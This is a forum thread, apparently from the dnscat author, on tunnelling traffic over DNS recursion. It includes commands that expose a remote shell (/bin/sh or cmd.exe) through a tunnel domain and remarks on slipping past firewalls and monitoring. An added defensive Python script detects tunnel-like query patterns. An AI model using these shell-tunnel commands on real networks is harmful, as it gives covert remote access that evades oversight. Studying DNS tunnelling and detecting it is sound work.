Hi folks,
Communicating by DNS is great because the client only needs the ability to talk to a single DNS server, any DNS server on the Internet (with recursion enabled). dnscat will, by default, use the system DNS server, which should cover basically every case. Firewalls aren’t going to stop you from talking to your local DNS server, right? And I don’t know about the average network, but on ours there are thousands of DNS queries every minute, so a little bit of extra traffic just gets lost in the flow.
In brief, dnscat works by taking advantage of DNS recursion. It sends messages to the authoritative nameserver for a domain, which is the key — to be a server, you have to be the authoritative nameserver for a domain. For example, I’m the authoritative server for skullseclabs.org, so any requests that end with .skullseclabs.org, no matter where they originate, will eventually connect to 208.81.2.52 (my current address).
Example: Remote shell.
Typically, to tunnel a shell over DNS, you’re going to want to run a standard server as before:
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"
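A defender's view of the traffic described above, as an added example that is not part of the original post or of dnscat: each message has to reach the authoritative server, so it travels in a fresh name under the tunnel's zone, and a zone where almost every query is a new, long name stands out even in a busy resolver log. The log format, the thresholds and the two-label zone guess are assumptions, and the sample queries are constructed.

```python
from collections import defaultdict

def parent_zone(qname, keep=2):
    """Crude zone guess: the last `keep` labels (assumption; use a public suffix list in production)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-keep:])

def zone_stats(queries):
    """Group (client, qname) pairs by parent zone and summarise the subdomain part."""
    seen = defaultdict(list)
    for _client, qname in queries:
        name = qname.rstrip(".").lower()
        zone = parent_zone(name)
        # Everything left of the zone is where a tunnel would carry its data.
        seen[zone].append(name[: -len(zone)].rstrip("."))
    return {
        zone: {
            "queries": len(subs),
            "unique": len(set(subs)),
            "mean_len": sum(len(s) for s in subs) / len(subs),
        }
        for zone, subs in seen.items()
    }

def tunnel_candidates(queries, min_unique=5, min_ratio=0.9, min_mean_len=30):
    """Zones where nearly every query is a new, long name, so the recursive
    resolver can never answer from cache and must forward each request."""
    flagged = []
    for zone, s in zone_stats(queries).items():
        if (s["unique"] >= min_unique
                and s["unique"] / s["queries"] >= min_ratio
                and s["mean_len"] >= min_mean_len):
            flagged.append(zone)
    return sorted(flagged)

# Constructed sample log, not real traffic. example.org stands in for a tunnel zone.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com"), ("10.0.0.6", "mail.example.com"),
    ("10.0.0.5", "www.example.com"), ("10.0.0.7", "cdn.example.net"),
    ("10.0.0.7", "cdn.example.net"), ("10.0.0.5", "www.example.com"),
]
SAMPLE_QUERIES += [
    ("10.0.0.9", ("constructed chunk %02d" % i).encode().hex() + ".example.org")
    for i in range(8)
]

if __name__ == "__main__":
    for zone, s in sorted(zone_stats(SAMPLE_QUERIES).items()):
        print(zone, s)
    print("candidates:", tunnel_candidates(SAMPLE_QUERIES))
```

Raw query volume is a weak signal on a busy network; the ratio of unique names to total queries per zone is what separates this pattern from ordinary lookups, which repeat and get cached.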
😀 Cool!
I am looking forward to seeing it. Having an MS plugin means having a lot of different payloads already written and tested. Thanks for your contribution!
BTW, if you need help feel free to contact me.
You're welcome. Thanks for your kind words!
I am actually working on some generic shellcode right now. This isn't my specialty, but I'm really having fun with it. Doing it for Metasploit is definitely something I'm hoping to do in the future.
Ron